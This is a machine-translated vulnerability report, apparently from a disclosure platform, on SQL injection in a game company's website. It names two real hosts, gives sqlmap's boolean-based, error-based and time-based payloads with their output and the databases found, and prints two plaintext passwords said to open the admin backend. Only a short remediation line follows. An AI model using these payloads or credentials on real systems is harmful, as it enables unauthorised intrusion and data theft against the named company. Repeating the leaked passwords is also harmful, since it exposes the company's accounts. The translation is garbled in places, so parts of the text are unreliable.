Hero mutual Entertainment's general SQL Injection getshell (full name gun battle/dance every day/Beautiful diary in summer/kung fu all-star) management background fall
I don't know how to getshell ~
Can I open/m/list.html on the official game website? Cid = 1 is basically injected
Cid Parameter
Http://xm.yingxiong.com/m/list.html? Cid = 1 (GET)
sqlmap identified the following injection points with a total of 73 HTTP(s) requests:---Parameter: cid (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cid=(SELECT (CASE WHEN (1182=1182) THEN 1182 ELSE 1182*(SELECT 1182 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cid=1 AND (SELECT 6605 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6605=6605,1))),0x7170766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DVat)---back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: cid (GET) Type: boolean-based blind Title: MySQL >= 5.0 boolean-based blind - Parameter replace Payload: cid=(SELECT (CASE WHEN (1182=1182) THEN 1182 ELSE 1182*(SELECT 1182 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END)) Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause Payload: cid=1 AND (SELECT 6605 FROM(SELECT COUNT(*),CONCAT(0x7171627871,(SELECT (ELT(6605=6605,1))),0x7170766b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) Type: AND/OR time-based blind Title: MySQL >= 5.0.12 AND time-based blind (SELECT) Payload: cid=1 AND (SELECT * FROM (SELECT(SLEEP(5)))DVat)---back-end DBMS: MySQL 5.0available databases [2]:[*] information_schema[*] xmcms
Http://demo.yingxiong.com/m/list.html? Cid = (GET)
sqlmap identified the following injection points with a total of 73 HTTP(s) requests:---Parameter: cid (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace Payload: cid=(SELECT 2365 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (ELT(2365=2365,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---back-end DBMS: MySQL 5.0sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: cid (GET) Type: error-based Title: MySQL >= 5.0 error-based - Parameter replace Payload: cid=(SELECT 2365 FROM(SELECT COUNT(*),CONCAT(0x716a707871,(SELECT (ELT(2365=2365,1))),0x7176707171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---back-end DBMS: MySQL 5.0available databases [2]:[*] gongfu[*] information_schema
I don't have to post it all.
[Email protected] two passwords can be unlocked! Using the two passwords rjkXM and rfF4gi is almost no hindrance.
Solution:
The backend Shenma is still not open to the Internet.
Carefully check SQL Problems